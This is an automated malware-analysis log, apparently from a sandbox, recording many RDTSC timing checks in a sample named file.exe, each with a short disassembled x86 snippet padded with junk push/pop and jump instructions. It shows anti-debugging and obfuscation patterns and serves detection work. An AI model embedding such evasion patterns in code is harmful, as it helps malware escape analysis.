      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 658A2A second address: 658A36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 658A36 second address: 658A3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 658A3C second address: 658A42 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 658A42 second address: 658A4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 658BB7 second address: 658BBD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 658BBD second address: 658BC2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 658D20 second address: 658D24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 658D24 second address: 658D3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7C474F641h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 658D3F second address: 658D45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 658D45 second address: 658D49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 658EC3 second address: 658EC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 658EC9 second address: 658ECE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 658ECE second address: 658ED6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65DDEA second address: 65DDEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65DDEE second address: 65DDFC instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC7C5219A56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65DDFC second address: 65DE02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65DE02 second address: 65DE16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C5219A60h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65E112 second address: 65E116 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65E25A second address: 65E273 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jnc 00007FC7C5219A5Ah 0x0000000b push esi 0x0000000c pop esi 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 jbe 00007FC7C5219A56h 0x00000019 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65E273 second address: 65E27E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65E583 second address: 65E587 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65E587 second address: 65E58B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65E6E6 second address: 65E6EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65E6EC second address: 65E6F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65E6F1 second address: 65E71F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C5219A5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jnp 00007FC7C5219A5Ch 0x00000010 jmp 00007FC7C5219A5Eh 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65E71F second address: 65E723 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65E723 second address: 65E727 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65E727 second address: 65E72D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65E994 second address: 65E99E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FC7C5219A56h 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65E99E second address: 65E9A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 664C1F second address: 664C25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 663A4B second address: 663A50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 624C76 second address: 60AD00 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC7C5219A56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FC7C5219A63h 0x0000000f popad 0x00000010 push eax 0x00000011 jmp 00007FC7C5219A5Ch 0x00000016 nop 0x00000017 pushad 0x00000018 sbb dh, 00000021h 0x0000001b popad 0x0000001c lea eax, dword ptr [ebp+124849BEh] 0x00000022 push ecx 0x00000023 jmp 00007FC7C5219A5Eh 0x00000028 pop edi 0x00000029 nop 0x0000002a push edx 0x0000002b pushad 0x0000002c push ebx 0x0000002d pop ebx 0x0000002e jl 00007FC7C5219A56h 0x00000034 popad 0x00000035 pop edx 0x00000036 push eax 0x00000037 jmp 00007FC7C5219A5Ah 0x0000003c nop 0x0000003d push 00000000h 0x0000003f push ebx 0x00000040 call 00007FC7C5219A58h 0x00000045 pop ebx 0x00000046 mov dword ptr [esp+04h], ebx 0x0000004a add dword ptr [esp+04h], 00000015h 0x00000052 inc ebx 0x00000053 push ebx 0x00000054 ret 0x00000055 pop ebx 0x00000056 ret 0x00000057 jmp 00007FC7C5219A68h 0x0000005c call dword ptr [ebp+122D19F7h] 0x00000062 push eax 0x00000063 push edx 0x00000064 jl 00007FC7C5219A58h 0x0000006a pushad 0x0000006b popad 0x0000006c jmp 00007FC7C5219A64h 0x00000071 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 624EB7 second address: 624EBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6252EB second address: 62530B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FC7C5219A62h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62530B second address: 62530F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6253B0 second address: 6253CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C5219A68h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6253CC second address: 6253D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007FC7C474F636h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6253D7 second address: 6253FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 add dword ptr [esp], 49D49421h 0x0000000e mov dword ptr [ebp+122D19D8h], eax 0x00000014 push F863E843h 0x00000019 push eax 0x0000001a push edx 0x0000001b jbe 00007FC7C5219A58h 0x00000021 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62550D second address: 625511 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 625EA0 second address: 625EBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 ja 00007FC7C5219A56h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 jmp 00007FC7C5219A5Bh 0x00000015 pop esi 0x00000016 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 625F7A second address: 625FAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC7C474F644h 0x00000008 jmp 00007FC7C474F642h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 push edi 0x00000015 pop edi 0x00000016 pop edi 0x00000017 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 625FAD second address: 60B846 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007FC7C5219A58h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 mov edx, dword ptr [ebp+122D3ADFh] 0x0000002b call dword ptr [ebp+122D1C49h] 0x00000031 push eax 0x00000032 push edx 0x00000033 js 00007FC7C5219A68h 0x00000039 push eax 0x0000003a pop eax 0x0000003b jmp 00007FC7C5219A60h 0x00000040 pushad 0x00000041 push ebx 0x00000042 pop ebx 0x00000043 jg 00007FC7C5219A56h 0x00000049 popad 0x0000004a rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 663E7F second address: 663E9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7C474F648h 0x00000009 popad 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 663FF3 second address: 664011 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FC7C5219A62h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 664011 second address: 66402E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C474F641h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007FC7C474F636h 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66402E second address: 664064 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FC7C5219A67h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push esi 0x0000000d jmp 00007FC7C5219A5Dh 0x00000012 push eax 0x00000013 push edx 0x00000014 jno 00007FC7C5219A56h 0x0000001a push edx 0x0000001b pop edx 0x0000001c rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 664064 second address: 664068 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6641CA second address: 6641D8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jp 00007FC7C5219A56h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6641D8 second address: 6641DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6641DE second address: 6641E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6641E2 second address: 664202 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FC7C474F643h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 664202 second address: 664221 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC7C5219A56h 0x00000008 ja 00007FC7C5219A56h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC7C5219A5Dh 0x00000017 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66452D second address: 664538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FC7C474F636h 0x0000000a pop eax 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 664538 second address: 664549 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7C5219A5Dh 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 664549 second address: 66454D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66454D second address: 664553 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6646A0 second address: 6646AA instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC7C474F636h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6646AA second address: 6646B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6646B0 second address: 6646B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 664807 second address: 66480D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6709AB second address: 6709C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7C474F645h 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 670E31 second address: 670E37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6710E9 second address: 6710EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 671354 second address: 67135A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 674141 second address: 674145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6742D2 second address: 6742D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67460D second address: 674613 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 674613 second address: 674617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 674617 second address: 674629 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC7C474F636h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007FC7C474F636h 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 676F9D second address: 676FB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FC7C5219A5Dh 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 676FB2 second address: 676FE1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FC7C474F63Ah 0x00000008 jmp 00007FC7C474F647h 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 jns 00007FC7C474F636h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 676FE1 second address: 676FE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DC14F second address: 5DC153 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67DD8B second address: 67DD8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67C81B second address: 67C868 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7C474F649h 0x00000009 popad 0x0000000a pushad 0x0000000b js 00007FC7C474F636h 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007FC7C474F63Ch 0x00000018 jmp 00007FC7C474F646h 0x0000001d popad 0x0000001e push edi 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67C982 second address: 67C98D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67C98D second address: 67C9B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FC7C474F636h 0x0000000a jmp 00007FC7C474F63Fh 0x0000000f popad 0x00000010 js 00007FC7C474F642h 0x00000016 push edi 0x00000017 pop edi 0x00000018 jmp 00007FC7C474F63Ah 0x0000001d rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 625946 second address: 6259FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FC7C5219A5Bh 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007FC7C5219A58h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 add dx, 8FD6h 0x0000002b mov ebx, dword ptr [ebp+124849FDh] 0x00000031 push 00000000h 0x00000033 push ebp 0x00000034 call 00007FC7C5219A58h 0x00000039 pop ebp 0x0000003a mov dword ptr [esp+04h], ebp 0x0000003e add dword ptr [esp+04h], 00000019h 0x00000046 inc ebp 0x00000047 push ebp 0x00000048 ret 0x00000049 pop ebp 0x0000004a ret 0x0000004b mov dword ptr [ebp+122D38A6h], esi 0x00000051 add eax, ebx 0x00000053 call 00007FC7C5219A5Eh 0x00000058 add dx, B24Ch 0x0000005d pop ecx 0x0000005e push eax 0x0000005f jne 00007FC7C5219A60h 0x00000065 mov dword ptr [esp], eax 0x00000068 jmp 00007FC7C5219A5Dh 0x0000006d push 00000004h 0x0000006f movsx edx, dx 0x00000072 push eax 0x00000073 pushad 0x00000074 push eax 0x00000075 push edx 0x00000076 jmp 00007FC7C5219A62h 0x0000007b rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6259FC second address: 625A05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67D16E second address: 67D172 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67D172 second address: 67D18B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 jmp 00007FC7C474F63Fh 0x0000000e pop edi 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 680F86 second address: 680F98 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC7C5219A56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007FC7C5219A56h 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 680F98 second address: 680FAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C474F640h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 680CBB second address: 680CBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EE6AB second address: 5EE6B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68524F second address: 685255 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 685255 second address: 68525D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68525D second address: 685263 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 685263 second address: 685267 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68D8A4 second address: 68D8D9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FC7C5219A71h 0x0000000c jmp 00007FC7C5219A5Ch 0x00000011 jmp 00007FC7C5219A5Fh 0x00000016 push eax 0x00000017 jl 00007FC7C5219A56h 0x0000001d pop eax 0x0000001e push eax 0x0000001f push edx 0x00000020 push edx 0x00000021 pop edx 0x00000022 push edx 0x00000023 pop edx 0x00000024 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68BC40 second address: 68BC4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FC7C474F636h 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68BF36 second address: 68BF41 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jne 00007FC7C5219A56h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68C56F second address: 68C573 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68C573 second address: 68C58E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7C5219A65h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68C58E second address: 68C594 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
